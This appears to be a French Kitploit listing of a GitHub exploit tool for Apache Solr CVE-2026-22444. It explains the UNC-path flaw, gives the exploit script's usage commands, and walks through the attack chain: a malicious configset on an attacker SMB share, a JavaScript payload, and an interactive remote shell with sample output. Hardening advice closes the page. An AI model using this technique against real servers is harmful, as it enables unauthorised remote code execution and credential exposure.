Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22444 — Exploit pour Apache Solr CVE-2026-22444, exploitant l'injection de chemin UNC et un serveur SMB pour parvenir à une exécution de code à distance via un configset malveillant et une charge utile JavaScript. | Kitploit
Outils/GitHubGitHub/bfdfhdsfdd-crypto/cve-2026-22444
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubbfdfhdsfdd-crypto/cve-2026-22444

CVE-2026-22444

Exploit pour Apache Solr CVE-2026-22444, exploitant l'injection de chemin UNC et un serveur SMB pour parvenir à une exécution de code à distance via un configset malveillant et une charge utile JavaScript.

Voir le dépôt
il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-22444

Vulnérabilité de validation de chemin UNC dans Apache Solr

Aperçu

CVE-2026-22444 est une vulnérabilité de sécurité affectant Apache Solr, divulguée publiquement vers le 20 janvier 2026. Cette vulnérabilité provient d'une validation d'entrée insuffisante (CWE-20: Improper Input Validation) sur certains paramètres de l'API "create core" d'Apache Solr, permettant à un attaquant de contourner les règles de sécurité lorsque Solr fonctionne en mode "standalone", ce qui peut entraîner une fuite de données, une exécution de code à distance (RCE) ou la divulgation de hachages NTLM.

Plus précisément, si Solr n'a pas l'authentification activée ou si l'utilisateur dispose des droits de création de core, un attaquant peut abuser de cette API via des requêtes spécialement conçues pour accéder à des fichiers protégés ou exécuter des actions malveillantes.

Informations de divulgation

La vulnérabilité a été découverte et signalée à Apache en 2025, puis divulguée publiquement sur la liste de diffusion oss-security :

Annonce officielle : https://www.openwall.com/lists/oss-security/2026/01/20/5

Détails techniques

La vulnérabilité existe dans CoreContainer.java, où le constructeur CoreDescriptor déclenche des opérations réseau avant d'effectuer la validation du chemin UNC :

  • instancePath.toAbsolutePath() peut résoudre des chemins UNC via le réseau
  • Le contrôle Files.exists() effectue un appel réseau
  • Files.newInputStream() effectue une lecture réseau
  • La validation du chemin via assertPathAllowed() n'a lieu qu'après ces opérations

Chronologie

  • 2025-08-20 : Vulnérabilité découverte et signalée à Apache
  • 2026-01-20 : Divulgation publique

Contenu du dépôt

  • exploit.py - Script d'exploitation de preuve de concept
  • files/ - Fichiers de support nécessaires à l'exploitation (configset)
    • rce.js - Payload JavaScript d'exécution de code à distance
    • conf/ - Fichiers de configuration Solr
      • solrconfig.xml - Définit la chaîne de processeurs de mise à jour malveillante
      • schema.xml - Définition du schéma Solr
      • managed-schema - Fichier de schéma géré
  • requirements.txt - Dépendances Python

Instructions d'utilisation

Prérequis

  • Python 3.6+
  • Le système cible doit exécuter Apache Solr (système Windows, mode autonome)
  • Le Solr cible n'a pas l'authentification activée, ou l'attaquant dispose des droits de création de core

Installation des dépendances

root@kitploit:~
pip install -r requirements.txt

Les dépendances incluent :

  • requests>=2.25.0 - Pour les requêtes HTTP
  • impacket>=0.10.0 - Pour créer le serveur SMB

Utilisation de base

1. Attaque de base (détection automatique de l'IP locale)

root@kitploit:~
python3 exploit.py <IP_cible>

Exemple :

root@kitploit:~
python3 exploit.py 192.168.1.100

2. Spécifier le port Solr

root@kitploit:~
python3 exploit.py <IP_cible> --port <port>

Exemple :

root@kitploit:~
python3 exploit.py 192.168.1.100 --port 8983

3. Spécifier la configuration du serveur SMB

root@kitploit:~
python3 exploit.py <IP_cible> --smb-host <IP_serveur_SMB> --smb-port <port_SMB>

Exemple :

root@kitploit:~
python3 exploit.py 192.168.1.100 --smb-host 192.168.1.50 --smb-port 445

4. Nom de partage SMB personnalisé

root@kitploit:~
python3 exploit.py <IP_cible> --share-name <nom_partage>

Exemple :

root@kitploit:~
python3 exploit.py 192.168.1.100 --share-name myshare

Description des arguments de ligne de commande

root@kitploit:~
Arguments positionnels :
  target_host           Adresse IP du serveur Solr cible

Arguments optionnels :
  -h, --help            Affiche le message d'aide et quitte
  --port, -p PORT       Port du serveur Solr (défaut : 8983)
  --smb-host SMB_HOST   IP du serveur SMB (défaut : détection automatique de l'IP locale)
  --smb-port SMB_PORT   Port du serveur SMB (défaut : 445)
  --share-name SHARE    Nom du partage SMB (défaut : malicious)

Déroulement de l'attaque

  1. Démarrage du serveur SMB : Le script démarre un serveur SMB local qui partage le répertoire files
  2. Création du core malveillant : Envoie une requête de création de core au Solr cible, pointant vers le configset malveillant sur le serveur SMB
  3. Déclenchement du payload : Solr télécharge les fichiers de configuration depuis le serveur SMB, contenant le code JavaScript malveillant
  4. Exécution des commandes : Déclenche l'exécution du payload JavaScript en envoyant une requête de mise à jour
  5. Shell interactif : Après une exploitation réussie, un environnement d'exécution de commandes interactif est fourni

Utilisation du shell interactif

Après une exploitation réussie, le script fournit un shell interactif :

root@kitploit:~
solr> whoami
[+] exit_code: 0, status: success
--- stdout ---
desktop-abc123\user

solr> dir
[+] exit_code: 0, status: success
--- stdout ---
Volume in drive C has no label.
...

solr> exit
[*] exiting shell...

Commandes prises en charge :

  • Toute commande Windows CMD
  • exit ou quit - Quitter le shell interactif
  • Ctrl+C - Interrompre et quitter

Fonctionnement

La vulnérabilité exploite la chaîne technique suivante :

  1. Injection de chemin UNC : Injection d'un chemin UNC via le paramètre configSet (par exemple //ip-attaquant/partage)
  2. Serveur SMB : Héberge les fichiers de configuration Solr malveillants
  3. RCE JavaScript : Exploite StatelessScriptUpdateProcessorFactory de Solr pour exécuter du code JavaScript
  4. Exécution de commandes : Exécute des commandes arbitraires sur le système cible via l'API Java Runtime

Exemples d'utilisation avancée

Exemple avec tous les paramètres

root@kitploit:~
python3 exploit.py 192.168.35.31 \
  --port 8983 \
  --smb-host 192.168.35.50 \
  --smb-port 445 \
  --share-name exploit

Description de la structure des fichiers

root@kitploit:~
CVE-2026-22444/
├── exploit.py              # Script d'exploitation principal
├── requirements.txt        # Dépendances Python
├── files/                  # Configset malveillant
│   ├── rce.js             # Payload JavaScript RCE
│   └── conf/              # Répertoire de configuration Solr
│       ├── solrconfig.xml # Configure le processeur de mise à jour malveillant
│       ├── schema.xml     # Définition du schéma
│       └── managed-schema # Schéma géré
└── README.md              # Ce fichier

Description du payload

rce.js : C'est le payload RCE principal, qui :

  • Intercepte les opérations de mise à jour de Solr (add, delete, commit, rollback)
  • Récupère le paramètre cmd depuis les paramètres de la requête
  • Exécute les commandes via l'API Java Runtime
  • Capture stdout et stderr
  • Renvoie le résultat de l'exécution et le code de sortie

solrconfig.xml : Configure Solr pour utiliser la chaîne de processeurs de mise à jour malveillante :

  • Définit la chaîne de processeurs de mise à jour rce-chain
  • Référence le script rce.js
  • Configure le processeur de requêtes /update pour utiliser cette chaîne

Avertissements

⚠️ Attention : Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'utilisation non autorisée de cet outil pour attaquer des systèmes est illégale.

  • Assurez-vous d'obtenir une autorisation écrite explicite avant utilisation
  • Utilisez uniquement dans des environnements de test ou des environnements avec autorisation légale
  • Ne l'utilisez pas sur des systèmes de production, sauf dans un environnement de test d'intrusion contrôlé
  • L'utilisateur est responsable de ses propres actions

Recommandations de protection

  1. Mettre à niveau Solr : Mettez à niveau Apache Solr vers une version corrigeant cette vulnérabilité
  2. Activer l'authentification : Assurez-vous que Solr dispose d'un mécanisme d'authentification fort
  3. Restreindre les droits de création de core : Accordez les droits de création de core uniquement aux utilisateurs de confiance
  4. Isolation réseau : Déployez Solr dans un environnement réseau protégé
  5. Règles de pare-feu : Limitez l'accès à l'interface d'administration de Solr
  6. Surveillance des activités anormales : Surveillez les accès aux chemins UNC et les requêtes anormales de création de core

Liens de référence

  • Site officiel d'Apache Solr
  • Annonce sur la liste de diffusion OSS Security
  • CWE-20: Improper Input Validation

Licence

Ce projet est sous licence MIT. Veuillez consulter le fichier LICENSE pour plus de détails.

Avertissement de non-responsabilité

Cet outil et ces informations sont fournis uniquement à des fins de recherche en sécurité et d'éducation. L'auteur n'est pas responsable des dommages causés par l'utilisation abusive de ces informations ou de cet outil. L'utilisateur doit se conformer à toutes les lois et réglementations applicables et obtenir une autorisation appropriée avant utilisation.

Télécharger l’outil